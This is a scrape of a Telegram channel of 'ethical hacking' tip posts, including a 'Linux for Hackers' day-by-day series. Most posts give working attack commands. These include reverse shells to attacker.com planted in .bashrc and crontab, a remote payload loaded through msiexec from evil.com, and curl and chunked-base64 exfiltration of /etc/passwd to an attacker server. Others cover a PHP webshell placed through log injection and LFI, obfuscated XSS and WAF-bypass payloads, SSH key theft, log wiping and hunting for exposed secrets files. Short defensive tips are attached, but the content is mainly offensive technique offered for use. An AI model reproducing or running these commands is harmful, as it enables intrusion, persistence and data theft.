CyberSec Playground | Learn ethical hacking ⚡️
745 subscribers
73 photos
1 video
2 files
188 links
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
Download Telegram
🔥 Bug Bounty Tip – HTTP Parameter Pollution (HPP)
🧠 Bypass logic, elevate privileges, or even trigger hidden features with duplicate parameters!

💣 What is HPP?
HTTP Parameter Pollution occurs when an application fails to properly handle duplicate parameters in a URL or request body.

This can lead to:

Logic bypass
🚨 Privilege escalation
🔓 Access control flaws
💳 Financial manipulation

💥 Real-World Example:
GET /transfer?amount=100&admin=true&amount=1


- Server might use the first amount=100 for logging
- But the second amount=1 for actual transfer
- Result: You trick the system to log 100 but only transfer 1

🎯 Always Try These Patterns:

1️⃣ Duplicate parameter:
param=value1&param=value2


2️⃣ Encoded version
param=value1%26param=value2


3️⃣ Injected into body (POST):
username=admin&role=user&role=admin


🛠 Useful Targets:
- Payment systems (amount, price)
- Role/privilege fields (admin, is_admin)
- API calls with query params
- Legacy PHP or Java apps (common in multi-param mishandling)

📌 Tools to Use:
Burp Suite Intruder → to brute and fuzz parameter combos
Param Miner (Burp Extension) → for automatic HPP discovery
Custom Python Scripts → with requests to manually test HPP behavior

📢 Follow @cybersecplayground for more daily bounty tips, bypass payloads, and real-world examples!

#bugbounty #HPP #websecurity #bypasstips #infosec #cybersecurity #cybersecplayground
6🔥1
🧠 Linux for Hackers – Day 8
📍 Environment Variables & .bashrc Abuse for Persistence

Environment variables define the behavior of your shell. But in hacking, they’re also a persistence vector, a loot location, and a way to manipulate execution silently.

🌐 What Are Environment Variables?
They’re dynamic values used by the shell and applications.

Examples:
echo $HOME       # User’s home directory
echo $PATH # Where the shell looks for commands
echo $USER # Current username


Use printenv or env to list all:
printenv


🧠 Why They Matter in Hacking:

⚡️ $PATH defines where binaries are searched
→ If attacker adds a malicious binary earlier in the path, it can override trusted ones

⚡️ $HISTFILE stores command history
→ Set it to /dev/null to avoid leaving logs:
export HISTFILE=/dev/null

🎯 Persistence via .bashrc

The .bashrc file is executed every time a user opens a shell. Perfect place to hide a backdoor.

📌 Example: Add a reverse shell payload
echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> ~/.bashrc

Next time the user logs in? You get a shell. 😈

💣 Want stealth? Base64-encode your payload and decode inside .bashrc.

🧪 Try This Task:

View your .bashrc:
cat ~/.bashrc


Append a payload:
echo 'echo "Logged in as: $(whoami)"' >> ~/.bashrc

Start a new terminal. It auto-executes. 🔄

🔐 Defensive Tip: Always check .bashrc, .bash_profile, .profile, and /etc/profile for suspicious entries during incident response.

📡 Learn red team techniques like this daily on @cybersecplayground

💎 other CyberSecPlayground Medias:
🔗 Website
🔗 Github
🔗 Medium

🔍 Read more at : https://github.com/cybersecplaygro...

#Linux_for_Hackers
#linux #bashrc #persistence #redteam #infosec #cybersecurity #hackingtips
🔥71👍1
🔥 Red Team Tip – Weaponizing .msi Files via LOLBin
Most people think .msi files are just installers...
But red teamers know better. 😈

🧠 Why it works:
Microsoft’s built-in msiexec.exe can install packages remotely via a URL — and because it’s a signed, trusted Windows binary (LOLBin), most EDR/AVs won’t flag it.

💥 Command:
msiexec.exe /i http://evil[.]com/payload[.]msi /quiet

Executes remote payloads
No user interaction
No popups
Bypasses some security controls

🎯 Great for:
• Initial access
• Living-off-the-land (LOTL) persistence
• Evading detection during lateral movement

⚠️ Defensive tip:
Block outbound HTTP from msiexec.exe and monitor child process execution from it.

📌 Stay stealthy, stay sharp.
#redteam #LOLBins #msiexec #infosec #cybersecurity #pentest

🔒 Follow @cybersecplayground for more daily tips and tactics!
🔥42
🚨 Alert: CVE-2025-32429 – Blind SQL Injection in XWiki Platform
A critical Blind SQL Injection vulnerability has been discovered in the XWiki Platform, exposing thousands of services to potential exploitation.

🔥 PoC
📂 GitHub: https://github.com/byteReaper77/CVE-2025-32429

🧠 Impact
• Vulnerability allows unauthenticated attackers to perform SQL injection
• Can lead to data leakage, credential theft, and in some cases RCE
• Affects core logic in query processing

📊 Exposure Stats
🔍 Hunter Query: product.name="XWiki"
🌐 Link: https://hunter.how/list?searchValue=product.name%3D%22XWiki%22

📚 References
• Advisory: GHSA-vr59-gm53-v7cq
• JIRA Ticket: XWIKI-23093

🔒 Mitigation
• Apply official patches or upgrade to the latest secure version
• Use a web application firewall (WAF) with SQLi detection
• Monitor suspicious queries or traffic anomalies

💬 Share to warn others – awareness saves infrastructure!

#CVE2025 #XWiki #BlindSQLi #bugbountytips #infosec #vulnerability #hunterhow #cybersecurity
📡 Follow @cybersecplayground for daily CVEs, PoCs, and hacking insights.
4🔥3
🧠 Linux for Hackers – Day 9
📍 Processes, Services & Escalation via Running Tasks

Processes are the heartbeat of a Linux system. If you can see what’s running, you can:
Identify vulnerabilities
Hijack services
Stay hidden (or detect others)

🧠 What Is a Process?
A process is an instance of a running program. Every app, service, or script = a process.

Run:
ps aux | less

This shows everything running on the system, including user, memory use, and command line.

🔍 Why It Matters to Hackers:
⚡️ Find credentials in process arguments
⚡️ See what services are running as root
⚡️ Identify outdated software or open ports
⚡️ Discover misconfigured cron jobs or setuid binaries

🔧 Essential Commands:
ps aux                    # View all processes
top # Real-time system monitor
htop # Better version of top (install first)
systemctl list-units # See active services
systemctl status <name> # Check service status


Want to know what’s listening?
ss -tuln


💀 Real Attack Scenario:

Imagine this:
1️⃣ You find python3 /home/user/server.py running as root
2️⃣ That script is writable by your user
3️⃣ You inject a reverse shell — boom, root shell when service restarts

Or worse — it’s a scheduled cron job that runs every minute.

🧪 Try This Task:

Run and explore:

ps aux | grep root


Install and use htop:
sudo apt install htop
htop


Enumerate running services:
systemctl list-units --type=service

Look for misconfigs, unknown binaries, or weak scripts.

🔐 Hackers don’t attack blindly — they read the system like a map. Every process = potential entry or escalation path.

📡 Learn real red team tactics on @cybersecplayground

💎 other CyberSecPlayground Medias:
🔗 Website
🔗 Github
🔗 Medium
#linux #privilegeescalation #processes #systemctl #redteam #hacking
🔥81
🇯🇵 Japanese Obfuscated XSS Payload - 芸術的な難読化

あ='',い=!あ+あ,う=!い+あ,え=あ+{},お=い[あ++],か=い[き=あ],
く=++き+あ,け=え[き+く],
い[け+=え[あ]+(い.う+え)[あ]+う[く]+お+か+い[き]+け+お+え[あ]+か][け](う[あ]+う[き]+い[く]+か+お+"('ハッキングされました')")()


How It Works:
1️⃣ 変数名難読化: Uses Japanese hiragana (あ, い, う) as variables
2️⃣ Type Coercion Magic:

!あ+あ → "false"
あ+{} → "[object Object]"

3️⃣ Builds "alert": Gradually constructs alert('ハッキングされました')

Why It's Cool:
Bypasses WAFs that don't expect Unicode variables
Evades simple keyword filters (alert, prompt)
Works in modern browsers (Chrome/Firefox/Edge)

Try It Yourself:

👉🏻 Paste in console to see "ハッキングされました" popup
👉🏻 Modify the final string for custom XSS

🔍 Want More Advanced Payloads?

Visit https://github.com/cybers.../XSS for:

⚡️ obfuscated XSS techniques
⚡️ WAF bypass drills

📡 Learn real red team tactics on @cybersecplayground

💎 other CyberSecPlayground Medias:
🔗 Website
🔗 Github
🔗 Medium

Like/Repost if you'd use this in your next bounty test!
#XSS #WebSecurity #BugBounty #Japan #HackerArt
👍7
CyberSec Playground | Learn ethical hacking ⚡️
🇯🇵 Japanese Obfuscated XSS Payload - 芸術的な難読化 あ='',い=!あ+あ,う=!い+あ,え=あ+{},お=い[あ++],か=い[き=あ], く=++き+あ,け=え[き+く], い[け+=え[あ]+(い.う+え)[あ]+う[く]+お+か+い[き]+け+お+え[あ]+か][け](う[あ]+う[き]+い[く]+か+お+"('ハッキングされました')")() How It Works: 1️⃣ 変数名難読化: Uses Japanese hiragana (あ, い, う)…
🧠 Unicode-Based XSS Payloads – Ancient Scripts vs. Modern Filters

This file demonstrates Unicode-obfuscated XSS (Cross-Site Scripting) payloads that leverage non-standard Unicode characters such as Sumerian Cuneiform and Japanese Kana to bypass naive input filters, WAFs, or static regex-based sanitization. These payloads are functional, stealthy, and great for both bug bounty testing and educational demonstrations.


Read More on Github
🔥7
🧠 Linux for Hackers – Day 10
📍 Cron Jobs: Scheduled Tasks & Attack Vectors

In Linux, cron jobs automate tasks at scheduled times. But if misconfigured, they’re also a privilege escalation or persistence goldmine.

What is Cron?
A service that executes commands or scripts at specific times or intervals.

🗂 Cron jobs are stored in:
/etc/crontab

/etc/cron.d/

crontab -e (user-specific jobs)

/var/spool/cron/


🔧 Syntax Breakdown:
* * * * * command
│ │ │ │ │
│ │ │ │ └─ Day of week (0-6)
│ │ │ └─── Month (1-12)
│ │ └───── Day of month (1-31)
│ └─────── Hour (0-23)
└───────── Minute (0-59)


Example:
*/5 * * * * /home/user/backup.sh

→ runs every 5 minutes.

⚠️ Hacker Use Cases:

Writable Script Escalation
If a cron job runs /opt/script.sh as root and it’s writable by your user, inject payload:
echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> /opt/script.sh


Persistent Backdoor via Crontab:
(crontab -l ; echo "* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1") | crontab -

Executes every minute 😈

🧪 Try This Task:

View your user’s cron jobs:
crontab -l


Add a new job:
crontab -e


Insert:
*/1 * * * * echo "Job ran at $(date)" >> /tmp/cronlog.txt

Check /tmp/cronlog.txt after a minute.

🔐 Defensive Tip:
Always audit /etc/crontab, /etc/cron.d/, and user crontabs for suspicious or unknown entries.

📡 Follow @cybersecplayground for daily Linux hacking knowledge bombs.

💎 other CyberSecPlayground Medias:
🔗 Website
🔗 Github
🔗 Medium

#Linux_for_Hackers
#linux #cron #persistence #redteam #infosec #privilegeescalation
1🆒42
🔥 Server Log Injection + LFI = RCE 💥
This classic but deadly combo is still exploitable in many real-world targets, especially legacy systems!

🧩 How It Works:

1️⃣ Log Injection
Many web apps log headers like User-Agent, Referer, etc.

You send:
User-Agent: <?php system($_GET['cmd']); ?>

💥 Now the access log contains raw PHP code.

2️⃣ Log File Path Known or Guessable

E.g., /var/log/apache2/access.log
or even better:
Web-accessible logs at /logs/access.log

3️⃣ Combine With LFI
If the app has a Local File Inclusion bug, like:
/index?page=../../logs/access.log&cmd=id

🔥 Boom: Your injected PHP runs — Remote Code Execution achieved.

⚙️ Real-World Use:
Penetration tests
CTF challenges
Bug bounty on legacy systems

🛡 Mitigation Tips:
• Never trust user input in logs
• Set logs outside web root
• Sanitize input in headers
• Disable LFI vulnerabilities

⚠️ Responsible Use Only!
This technique can give full control over servers — handle with care and ethical intent.

📢 Stay sharp with @cybersecplayground
#BugBounty #LFI #RCE #LogInjection #CyberSecurity #CTF #infosec
1🔥61
🧠 Linux for Hackers – Day 11
📍 SSH: Access, Persistence & Key Hijacking

SSH is the gateway to most Linux servers. If you understand how it works, you can:
Gain access
Persist undetected
Hijack users or escalate privileges

🔐 What is SSH?
SSH (Secure Shell) is a protocol used to securely access and control remote systems.

🧬 Common usage:

ssh user@ip_address


🗂 Key Files Involved:
~/.ssh/id_rsa → Your private key
~/.ssh/id_rsa.pub → Your public key
~/.ssh/authorized_keys → Remote file that lists public keys allowed to access this user

🧠 Attacker Techniques:


1️⃣ Steal Private Keys

find / -name id_rsa 2>/dev/null


If you find one, check:
cat id_rsa


Try logging in with it:
ssh -i id_rsa user@target


2️⃣ Inject Your Public Key

Once you get access, add your public key to:
~/.ssh/authorized_keys

Now you can log in without a password anytime. 🔓

3️⃣ Abuse SSH Configs

Check /etc/ssh/sshd_config for:
🔸 PermitRootLogin yes
🔸 PasswordAuthentication yes
🔸 Misconfigs = easy access.

🧪 Try This Task:

⚡️ Generate a key pair:
ssh-keygen


⚡️ Copy your key to a target (if allowed):
ssh-copy-id user@target


⚡️ Or manually append to their authorized_keys file:
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys


⚡️ Now login with no password:
ssh user@target


📌 Red Team Tip:
Always check .ssh/ directories during post-exploitation. Keys = persistence.

📡 Learn offensive tactics daily at @cybersecplayground

#Linux_for_Hackers
#linux #ssh #persistence #redteam #infosec #pentesting #hacking
🔥7
💡 Blind RCE File Exfiltration via curl

If you’ve landed a Blind Remote Code Execution (RCE) but can trigger outbound HTTP requests (OOB — Out of Band), you can steal files from the target server without direct output.

🔹 Technique: Using curl with -d @file

When you run:
curl -d @index.php https://OOB_SERVER

-d @index.php → Reads the entire file index.php and sends it in the HTTP request body.

The OOB server receives the full file contents, even if the RCE output is not directly visible.

📌 Example Exploit Flow:
You control an OOB listener:
python3 -m http.server 8080

👉🏻 or use Burp Collaborator / Interactsh.

Trigger the Blind RCE on the target with:
curl -d @/etc/passwd https://your-server.com

The file contents are sent to your server in the POST request body.

🔥 Why This Works
⚡️ The @ syntax in curl tells it to read a local file instead of sending raw text.
⚡️ Perfect for exfiltrating sensitive files (config files, source code, creds) over HTTP in a single request.

🛡 Defense:
Restrict outbound HTTP requests from servers (Egress filtering).
Disable curl, wget, and similar tools in restricted environments.
Use web application firewalls (WAFs) to detect suspicious HTTP patterns.

📢 Follow @cybersecplayground for more RCE & exfiltration tricks.
#RCE #BugBounty #curl #Exfiltration #Infosec #CyberSecurity
🔥9
🧠 Linux for Hackers – Day 12
📍 File Permissions & Privilege Escalation Basics

Today we dive deeper into Linux file permissions and how attackers (and pentesters) can use them to escalate privileges.

📌 Understanding File Permissions
In Linux, every file and directory has three types of permissions for three different entities:

Owner (u) – The user who owns the file.
Group (g) – Users in the file's group.
Others (o) – All other users.

Permissions are represented as:
r → read
w → write
x → execute

Example:
-rwxr-x---

Owner → rwx (read, write, execute)
Group → r-x (read, execute)
Others → --- (no permissions)

🔍 Changing Permissions

chmod 755 file.txt   # rwxr-xr-x
chmod u+x script.sh # Add execute for owner
chmod g-w file.txt # Remove write from group


🚀 Privilege Escalation via Permissions
World-writable files (chmod 777) can be modified by anyone — a huge security risk.

SUID/SGID bits: Special permissions that allow executing as the file owner or group.
chmod u+s binary     # SUID
chmod g+s binary # SGID

If these are set on sensitive binaries, attackers can escalate privileges.

Example to find SUID binaries:
find / -perm -4000 2>/dev/null


Pentester Tip:

- Check /etc/passwd and /etc/shadow for incorrect permissions.
- Watch for writable configuration files for services running as root.
- SUID-enabled binaries with unintended features can often be abused.

📢 Follow @CyberSecPlayground for more daily Linux hacking lessons, tips, and real-world pentesting tricks!

💬 Like & share to support the series.
🔗 Read more at GITHUB

#Linux_for_Hackers
#linux #hacking #pentesting #infosec
🔥71
🚀 Next.js WAF Bypass: Cookie Reflection Exploit
Scenario:


👉🏻 Next.js app reflecting two cookies in pageProps
👀 WAF blocking malicious payloads in cookies

🔍 The Breakthrough:
Cookie: cookie1=alert(1); cookie2=x → 403 
Cookie: cookie1=alert; cookie2=(1) → 403
Cookie: cookie2=(1); cookie1=alert → 200


Why This Works:
1️⃣ Order Matters: WAF processes cookies sequentially
2️⃣ Split Logic: Neither cookie alone triggers the WAF
3️⃣ Execution Flow: Next.js combines them during pageProps hydration

🛠 Exploitation Steps:
🔸 Identify reflected cookies in NEXT_DATA script
🔸 Split your XSS payload (alert(1) → "alert" + "(1)")
🔸 Reverse the cookie order to bypass signature detection

💡 Pro Tip: Test with cookie2=);cookie1=alert(1// for DOM XSS!

📢 Follow @cybersecplayground for more RCE & exfiltration tricks.

#WebSecurity #WAFBypass #NextJS #BugBounty #XSS
6
CyberSec Playground | Learn ethical hacking ⚡️
🧠 Linux for Hackers – Day 12 📍 File Permissions & Privilege Escalation Basics Today we dive deeper into Linux file permissions and how attackers (and pentesters) can use them to escalate privileges. 📌 Understanding File Permissions In Linux, every file and…
🧠 Linux for Hackers – Day 13
📍 Environment Variables & PATH Hijacking 🛠

1️⃣ What Are Environment Variables?

Environment variables are key-value pairs that store shell and system configurations. Today, we’ll learn about them and how PATH hijacking can be exploited.

🔹 Common Environment Variables:

$HOME → Home directory
$USER → Current username
$PATH → Directories searched for executables

2️⃣ Modifying Environment Variables

You can set or modify environment variables using:
export VAR=value
export PATH=$PATH:/opt/tools


Persistent changes can be made in:
~/.bashrc (user-specific)
/etc/profile (system-wide)

🔹 PATH Hijacking Example:
If /tmp is in $PATH before /bin, an attacker could create a fake binary:
echo -e '#!/bin/bash\necho hacked' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
ls


🔹 Defense Tips:
🔸 Keep $PATH clean and ordered
🔸 Avoid writable directories in $PATH
🔸 Use absolute paths for critical scripts

🚀 Pro Tip for Pentesters: Always check $PATH for writable directories — it’s a common privilege escalation trick.

📢 Follow @cybersecplayground for more Linux hacking lessons and security tips!

💬 Like & share & Give star to support the series.
🔗 Read more at GITHUB

#Linux_for_Hackers
#linux #hacking #pentesting #infosec
3🗿3👍1
🚀 Bug Bounty Tip – Bypass Rate Limits with Race Conditions & Header Tricks

1️⃣ Race Condition Attacks (Outrunning the Counter)
Even strong brute-force protections can fail if you send requests at the exact same time.

🔸 HTTP/2 "Single-Packet" Attack → Use Turbo Intruder to send simultaneous login/OTP requests before the counter updates.

🔸 HTTP/1.1 "Last-Byte Sync" → Send almost all of a request, pause, then release the final bytes together (abusing Nagle’s algorithm).

💥 Result: OTP or password brute-force possible without triggering lockouts.

🔗 Read Full post at Medium And Github

💡 Stay sharp — timing & header tricks can sneak past “secure” protections.

📢 Follow @cybersecplayground for more daily bug bounty tactics & web hacking tips!
#bugbounty #ratelimit #racecondition #websecurity #cybersecplayground
🔥6
🚨 CVE-2025-47812: Wing FTP Server RCE (CVSS 10.0)
109K+ servers exposed – Patch NOW!

🔍 Quick Facts:
⚠️ Impact: Unauthenticated Remote Code Execution → SYSTEM access
This vulnerability originates from Wing FTP Server's improper handling of NULL bytes within the username parameter during the authentication process. This allows attackers to inject Lua code directly into session files. These malicious session files are then executed when a valid session is loaded, leading to arbitrary command execution on the server.


PoC: GitHub Exploit (Use responsibly!)

Targets: All versions < Wing FTP 7.4.5

💥 Hunter.How Query:
product.name="Wing FTP Server" && after="2025-06-01"


View Live Targets


🛠 Mitigation:

1️⃣ EMERGENCY UPDATE to v7.4.5+
2️⃣ Block HTTP PUT/POST methods at WAF level
3️⃣ Hunt for cmd.exe spawns in logs

📚 Full Analysis:
🔗 Null Pointer to RCE Writeup

👇 Like/Share if you’ve seen active exploitation!
🔔 📢 Follow @cybersecplayground for more daily CVE and POC!

#CriticalVuln #RCE #PatchNow #BugBounty #CVE #POC #CVE_2025_47812
👏3💊3
🧠 Linux for Hackers – Day 14
📍 Logs & System Auditing 🕵️‍♂️


📝 Goal: Learn how Linux logs system activities, how to read them, and how attackers might evade detection.

💎 Objective:
In the world of Linux, logging systems are often ignored—yet they hold the keys to diagnosing critical issues, uncovering security breaches, and tracing unauthorized access. For system administrators and cybersecurity professionals, logs provide the who, what, and why behind system failures and intrusions.

For penetration testers and ethical hackers, logs are the digital fingerprints that can expose your activity. The most effective attacks leave no trace, making log manipulation a crucial skill. But before you can cover your tracks, you must deeply understand Linux’s logging architecture.


🔹 Common Log Files:
/var/log/auth.log → Login attempts & sudo usage
/var/log/syslog → System-wide events
/var/log/kern.log → Kernel messages
journalctl → Central log viewer

⚡️ Some Examples:
🔸Initial Reconnaissance
journalctl -q –since “24 hours ago”

-This command quietly retrieves the last 24 hours of logs. The -q flag suppresses informational messages, reducing the noise and potential traces of your activities.

🔸Investigating User Activities
journalctl _UID=1000 –since “24 hours ago”

-This reveals that user “air” (UID 1000) has been actively using the system and has used “sudo” several times.

🔹 Check Logs:
grep "Failed" /var/log/auth.log
tail -n 50 /var/log/syslog
journalctl -p err


🔹 Attacker Tricks:

Clear logs:
echo "" > /var/log/auth.log

- Alter timestamps
- Redirect logs to attacker files

🎯 Your Task Today:
1️⃣ Find failed login attempts
grep "Failed" /var/log/auth.log

2️⃣ Monitor system logs live with:
tail -f /var/log/syslog

3️⃣ Correlate events using timestamps

💡 Pentester Tip: Logs are defenders’ eyes — if you blind them, do it without leaving footprints.

📢 Follow CyberSecPlayground for more Linux hacking tips
ℹ️ Read more at Gitbub : https://github.com/cybersecplaygr...
⚠️ Dont Forget to boost channel : BOOST

#Linux_for_Hackers
#linux #hacking #pentesting #infosec #pentest
👍52
🕵️ Recon Trick – One-Liner to Find Sensitive Files

ℹ️ Attackers often look for misconfigured files in subdomains. Just one exposed file (like /.env or /config.json) can leak database passwords, API keys, and tokens.

Here’s a powerful one-liner to automate the hunt:
subfinder -d domain.com -silent | \
while read host; do \
for path in /config.js /config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json /google-services.json /package.json /package-lock.json /composer.json /pom.xml /docker-compose.yml /manifest.json /service-worker.js; do \
echo "$host$path"; \
done; \
done | httpx -mc 200


🔎 How it works:

subfinder
→ finds subdomains
Loops through juicy file paths (config.json, .env, docker-compose.yml, etc.)
httpx -mc 200 → filters valid hits only

💡 Why it’s dangerous:

/.env → DB creds, JWT secrets
/config.json → API tokens
/firebase.json → Firebase access
/docker-compose.yml → internal service info

⚔️ Defense Tips:

🔸 Never expose sensitive files in web root
🔸 Use .gitignore & deployment rules to exclude secrets
🔸 Scan your own assets with this method before attackers do

🔗 Follow @cybersecplayground for more recon & hacking tricks
👍 Like & 🔁 Share to help others secure their apps!

#recon #bugbounty #infosec #osint #cybersecurity
🔥61
🧠 Linux for Hackers – Day 15
📍 Networking Fundamentals for Hackers


Today we explore Linux networking basics — essential for both defenders and attackers , networking is related to cybersecurity as computer networks are often the primary targets of cyber attacks. Understanding networking protocols and configurations is essential for cybersecurity professionals to prevent and mitigate these attacks.

🔹 Key Commands:

ip a → Show network interfaces
ping target.com → Test connectivity
ss -tulnp → Show open/listening ports
traceroute target.com → Trace network path
dig domain.com → DNS lookup
curl ifconfig.me → Find your public IP

🔹 Traffic Monitoring:
ss -tnp
tcpdump -i eth0

With these, you can catch live traffic and detect connections.

🔹 Attacker Angle:
Hackers use these to:
⚡️ Discover open ports
⚡️ Map networks
⚡️ Enumerate DNS records
⚡️ Monitor traffic for credentials

Your Task:
1️⃣ Run ss -tulnp and list open ports.
2️⃣ Capture packets with tcpdump -i eth0.
3️⃣ Use dig to enumerate DNS records.

💡 Pentester Tip: Networking is the backbone of hacking. Master the wire, and you master the attack.

🔗 Read on github

📢 Follow @CyberSecPlayground for more Linux hacking lessons and real-world pentesting tricks!

#Linux_for_Hackers
#linux #hacking #pentesting #infosec #pentest
👍621
CyberSec Playground | Learn ethical hacking ⚡️
💡 Blind RCE File Exfiltration via curl If you’ve landed a Blind Remote Code Execution (RCE) but can trigger outbound HTTP requests (OOB — Out of Band), you can steal files from the target server without direct output. 🔹 Technique: Using curl with -d @file…
🚨 Exfiltrating Files via Base64 + Chunked Requests
Sometimes servers or firewalls block direct file leaks.
A sneaky trick is to encode files in Base64 and send them in small chunks to bypass restrictions.


💻 One-liner:

i=0; base64 /etc/passwd | fold -w 60 | \
while read -r line; do \
curl -s -X POST -d "$line" http://YOUR-VPS.COM/chunk$i; \
i=$((i+1)); \
sleep 0.5; \
done


🔎 How it works
1️⃣ Encodes /etc/passwd into Base64
2️⃣ Splits into 60-char chunks
3️⃣ Sends each chunk via POST requests
4️⃣ Adds delay to avoid WAF / IDS detection

⚔️ Defensive Notes
👉🏻 Monitor repeated outbound requests
👉🏻 Watch for Base64 patterns in traffic
👉🏻 Apply strict egress filtering

🔐 Red teamers use it for blind RCE exfiltration — defenders should know how to spot it.

👉 Follow @cybersecplayground for more daily tips & payloads.
❤️ Like & Share to spread the knowledge!

Inspired by AL𓆣FA's Comment
#infosec #pentest #redteam #cybersecurity
🔥8
🧠 Linux for Hackers – Day 16
📍 Firewalls & Packet Filtering (iptables & ufw)

Firewalls are the gatekeepers of Linux systems — understanding them is critical for both defenders and attackers.

🔹 iptables Basics

- Traffic is filtered by tables (filter, nat, mangle)
- Each table has chains (INPUT, OUTPUT, FORWARD)
- Rules are processed top-to-bottom

Example:
iptables -L -n -v       # List all rules
iptables -A INPUT -p tcp --dport 22 -j ACCEPT # Allow SSH
iptables -A INPUT -j DROP # Drop everything else


🔹 ufw – Uncomplicated Firewall
Simpler frontend to iptables:
ufw status
ufw allow 80/tcp
ufw deny 23/tcp


🔍 Attacker’s View
Hackers enumerate firewall rules to see what’s open:
⚡️ nmap -Pn -p- target.com (port scan even if ICMP blocked)
⚡️ Tunneling attacks (e.g., SSH over port 443 to bypass restrictions)

🔥 Pentester Tip: Misconfigured firewalls often allow outbound traffic — attackers exploit this to exfiltrate data or create reverse shells.

Your Task:
1️⃣ Run iptables -L -n -v and analyze your firewall.
2️⃣ Block a port with iptables, then try connecting.
3️⃣ Use ufw to allow only HTTP/HTTPS and deny all else.

🔗 Read Full post at GITHUB

📢 Follow @CyberSecPlayground for more Linux hacking lessons and real-world pentesting tricks!

#Linux_for_Hackers
#linux #hacking #pentesting #infosec #pentest
🍓3🆒32👌1